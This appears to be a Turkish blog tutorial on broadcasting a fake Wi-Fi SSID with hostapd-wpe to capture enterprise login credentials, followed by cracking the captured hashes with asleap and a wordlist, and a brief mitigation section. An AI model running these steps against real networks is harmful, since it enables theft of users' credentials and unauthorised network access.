Sahte SSID yayınlama nasıl yapılır ?

Günümüzde en çok yapılan saldırılar wifi ağları üzerinden gelmektedir . Bir atak türü de rogue access point saldırısıdır.Başlıktan anlaşılacağı üzere fake bir ssıd yayınlayarak kullanıcıları girmek istedikleri ağlara dahil etmeyip kendi kurmuş olduğunuz wifi ağına dahil ediyor gibi de düşünmeyin.örneğin bir kurumda çalışıyorsunuz ve ldap ile ağa dahil oluyorsunuz ve ldap kullanıcı adı ve şifreniz ile giriş yaparken sahte bir ssıd ye bilgilerinizi girerseniz , bilgileriniz saldırganın eline kolaylıkla geçecektir.

genel kapsamında atak türünü açıklamaya çalışacağım ,

 

Bu saldırıyı yaparken  hostapd-wpe  aracını kullanıyoruz.

apt-get install hostapd-wpe komutu ile aracı kali ‘ ye kuralım

nano /etc/hostapd-wpe/ hostapd-wpe.conf  komutu ile conf. dosyasını açıp ssıd yi değiştirelim. ( istedeğiniz ismi verebilirsiniz ) değiştirdikten sonra kaydedip çıkabilirsiniz.

airmon-ng check kill

hostapd-wpe /etc/hostapd-wpe/hstapd-wpe.conf  komutu ile ap yi açalım.

ve oltayı atmış oluyoruz. atmış olduğumuz oltaya düşen birisi olursa kullanıcı bilgileri ekranımıza düşecektir.Kullanıcı adı clear-text olara gözükecek , şifre hash’li şekilde gözükecektir. Hash ‘ i john gibi araçlar ile kırabilirsiniz.

veyahut , aşağıdaki komut ile açabilirsiniz.

zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C (tespit ettiğiniz challenge) -R (tespit ettiğiniz response )  -W –

komutu ile şifreyi clear text olarak da görebilirsiniz.

Çözüm Önerileri:

Evil twin saldırısının tespitinin basit ve kolay bir yöntemi maalesef yoktur. Bilinçli ve farkındalık seviyesi yüksek kurum çalışanı veya sistem yöneticisinin belli aralıklarla çevredeki ağ cihazlarını taramasıyla tespit edilebilmektedir. Bu noktada kritik sistemlerin erişilebilir olduğu kablosuz ağ çözümleri önerilmemektedir. Ele geçirilen bilgiler ile sisteme dahil olunursa kritik sistemler üzerinde servis dışı bırakmaya veya uzaktan komut çalıştırmaya varan etkiler ortaya çıkabilmektedir.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir